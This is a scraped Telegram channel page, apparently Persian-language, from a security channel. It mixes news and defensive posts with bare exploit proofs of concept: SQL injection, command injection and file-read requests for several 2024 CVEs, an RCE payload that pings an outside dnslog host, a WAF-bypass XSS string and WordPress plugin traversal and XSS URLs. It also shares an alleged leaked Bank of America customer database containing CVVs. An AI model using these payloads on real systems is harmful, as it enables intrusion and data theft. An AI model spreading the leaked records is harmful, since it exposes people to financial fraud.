P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
💡Hashmob
- بزرگترین انجمن بازیابی رمز عبور


HashMob
یک انجمن آنلاین بزرگ است که بر بازیابی رمز عبور و رمزنگاری متمرکز شده است. این به عنوان بستری برای همکاری کاربران در بهبود تحقیقات رمز عبور و کشف روندها عمل می کند. این انجمن منابعی مانند آمار، فهرست کلمات، قوانین، راهنماها و آموزش هایی را ارائه می دهد که برای محققان و آزمایش کنندگان نفوذ مفید است. علاوه بر این، HashMob از انواع الگوریتم‌های هش، از جمله الگوریتم‌های هش‌کت غیر باینری، پشتیبانی می‌کند و ابزارهایی برای بازیابی رمزهای عبور از فرمت‌هایی مانند MD5، SHA1، و ZIP و همچنین کیف پول‌های دیجیتالی مانند بیت‌کوین و اتریوم ارائه می‌کند.

HashMob[.]net
میزبان طیف وسیعی از منابع رسمی و فهرست هاست که برای تسهیل فعالیت های بازیابی رمز عبور استفاده می شود. این پلتفرم همچنین کاربران را تشویق می کند تا برای تعامل و پشتیبانی بیشتر به انجمن Discord خود بپیوندند .

لینک:
https://hashmob.net/
@PfkSecurity
گزارش باج‌افزار ThreatLabz 2024 Zscaler نشان می‌دهد که باج‌افزار DarkAnges بزرگترین پرداخت باج‌افزار تاریخ را دریافت کرده است: 75،000،000 دلار

برای درک این موضوع: کسی می تواند با این پول 524 مرسدس بنز G واگن 2024 بخرد.
ابزارهای حفظ حریم خصوصی

• در شرایط مدرن، حفظ ناشناس بودن و حفظ حریم خصوصی در حال تبدیل شدن به یک امتیاز نادر برای معدود منتخب - شهروندان ثروتمند یا آموزش دیده فنی است که می توانند سرور و VPN خود را راه اندازی کنند، می دانند چگونه #Linux را راه اندازی کنند، فایل ها را رمزگذاری کنند، از مدیران رمز عبور استفاده کنند، مرورگر Tor و غیره.

• اما حق ارتباطات امن و خصوصی نه تنها برای نخبگان فناوری، بلکه برای مردم عادی نیز باید رعایت شود.

• حریم خصوصی یک حق مطلق انسانی است. اگر هر کشوری بخواهد این حق را برای شهروندانش محدود کند، در آن صورت شهروندان می توانند نتایج مناسبی بگیرند.

• از لینک های زیر برای یافتن ابزارهای مفید برای کمک به حفظ حریم خصوصی و رازداری خود استفاده کنید:

https://github.com/cqcore/Privacy-Infosec-Tools-Resources

• راهنمای منحصر به فرد را فراموش نکنید که شامل 160 صفحه اطلاعات در مورد محافظت از هویت شما به صورت آنلاین در منابع و برنامه های مختلف است.
@PfkSecurity
fpga.pdf
6 MB
#reverse

F(PGA) Tour : Evading reverse engineering

@PfkSecurity
SpringBlade SQL

GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1

#exploit #poc #SQL
@pfksecurity
CVE-2024-7436

GET /msp_info.htm?flag=cmd&cmd=payload /1.1
Host: {{Host}}
Cookie: {{Cookie}}

payload

#exploit #poc #IoT
@pfksecurity
این را در مورد CSAM می‌گوید، اما تمام پیازها را در موتور جستجوی خود که هنوز CSAM دارند، حتی اگر قابل جستجو نباشد، فاش می‌کند. لطفا از Ahmia استفاده نکنید.

https://ahmia.fi/onions/
@pfksecurity
BNKoFAmerica.txt
120.4 MB
پایگاه داده 4.8 میلیون کاربر متعلق به Bank Of America

- شناسه کاربری، نام کامل، موجودی، تاریخ انقضا، نوع حساب، CVV
@PfkSecurity
Xss Bypass Waf

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

@PfkSecurity
CVE-2024-6095

POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"url":"file:///etc/passwd"}

#exploit #poc

@PfkSecurity
افزونه های وردپرس
____
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd


@PfkSecurity
CVE-2024-0195 Exploit

POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B

#exploit #poc
@PfkSecurity
زمان مغز بزرگ

دانیل راین به عنوان مهندس زیرساخت اصلی برای یک شرکت ناشناس استخدام شد. او عمداً اعتبار کنترلر دامنه را تغییر داد تا از کارفرمایش 750000 دلار اخاذی کند.

او اکنون با 30 سال زندان مواجه است.

https://www.bleepingcomputer.com/news/security/employee-arrested-for-locking-windows-admins-out-of-254-servers-in-extortion-plot/

@PfkSecurity
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻
در اینجا مجموعه‌ای از تکنیک‌های حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه می‌شوند درک کنند

🟣 https://github.com/pushsecurity/saas-attacks

🔷 این پروژه مجموعه‌ای از تکنیک‌های حمله مختص به Software as a service (SaaS) را معرفی می‌کند و با استفاده از چارچوب‌ MITRE ATT&CK، به تحلیل تهدیدات امنیتی در محیط‌های SaaS میپردازد.


#Saas
#APT

@PfkSecurity
P.F.K Security
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻 در اینجا مجموعه‌ای از تکنیک‌های حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه می‌شوند درک کنند 🟣 https://github.com/pushsecurity/saas-attacks 🔷 این پروژه مجموعه‌ای از تکنیک‌های…
🔺 تکنیک SAMLjacking یکی از روش های حملات فیشینگ است که روی قابلیت SSO (Single Sign-On) که اغلب در پلتفرم‌های SaaS (نرم‌افزار به عنوان سرویس) استفاده می‌شود، تمرکز دارد
در این نوع حمله، مهاجمان از اعتماد کاربران به فرآیندهای SSO سوءاستفاده می‌کنند تا به‌طور غیرمجاز به سیستم‌های یک شرکت دسترسی پیدا کنند.

⭕️ مراحل حمله:

مهاجم ابتدا یک حساب کاربری جدید در یک پلتفرم SaaS ایجاد می‌کند. این پلتفرم‌ها معمولاً شامل ابزارهای مختلفی هستند که شرکت‌ها برای مدیریت فعالیت‌های خود استفاده می‌کنند
💢 مانند Miro، Office 365، یا سایر خدمات مشابه.

⭕️ تنظیمات اولیه:
پس از ثبت‌نام، مهاجم می‌تواند تنظیمات مختلف حساب را پیکربندی کند. یکی از این تنظیمات مهم، پیکربندی URL مربوط به SSO (احراز هویت یکپارچه) است.
💢 این آدرسی است که سرویس‌های SSO برای احراز هویت کاربران از آن استفاده می‌کنند. مهاجم می‌تواند این URL را طوری تنظیم کند که به یک سرور تحت کنترل خود اشاره کند و عملیات فیشینگ را کامل کند

📩 مهاجم می‌تواند دعوت‌نامه‌هایی برای پیوستن به این "حساب جدید شرکتی" ارسال کند. این دعوت‌نامه‌ها به کاربران جدید یا اعضای بالقوه شرکت ارسال می‌شود.
📮 دعوت‌نامه‌ها به‌طور معمول از دامنه‌ای به نظر می‌رسد که قانونی و معتبر است (از دامنه سرویس‌دهنده SaaS).
📌 اگر مهاجم در ابتدا از یک URL سرویسی که به نظر قانونی است استفاده کند و سپس URL SSO را به سرور خود تغییر دهد، کاربران ممکن است فکر کنند که URL SSO تغییر نکرده و بدون شک به ورود ادامه دهند.

⚠️ راهکارهای مقابله:
🔰آگاهی و آموزش: آموزش کارکنان، به‌ویژه کارکنان جدید، در مورد ریسک‌های حملات فیشینگ و چگونگی شناسایی دعوت‌نامه‌های مشکوک

🔰 پیکربندی SSO: اطمینان از اینکه پیکربندی‌های SSO به‌طور دقیق کنترل و نظارت می‌شوند. هر گونه تغییر در URL‌های SSO باید بازبینی و تأیید شود.
🔰 ابزارهای پیشگیری از فیشینگ: استفاده از ابزارهای پیشرفته پیشگیری از فیشینگ که می‌توانند ایمیل‌ها یا لینک‌های مخرب را قبل از رسیدن به کارکنان شناسایی و مسدود کنند.
🔰 ممیزی SSO: انجام ممیزی‌های منظم روی پیکربندی‌ها و لاگ‌های SSO برای شناسایی هرگونه تغییر غیرمجاز یا فعالیت مشکوک.

👁‍🗨 https://www.youtube.com/watch?v=4gAeSxbycXU
📚 https://pushsecurity.com/blog/samljacking-a-poisoned-tenant/

#Initial_Access
#APT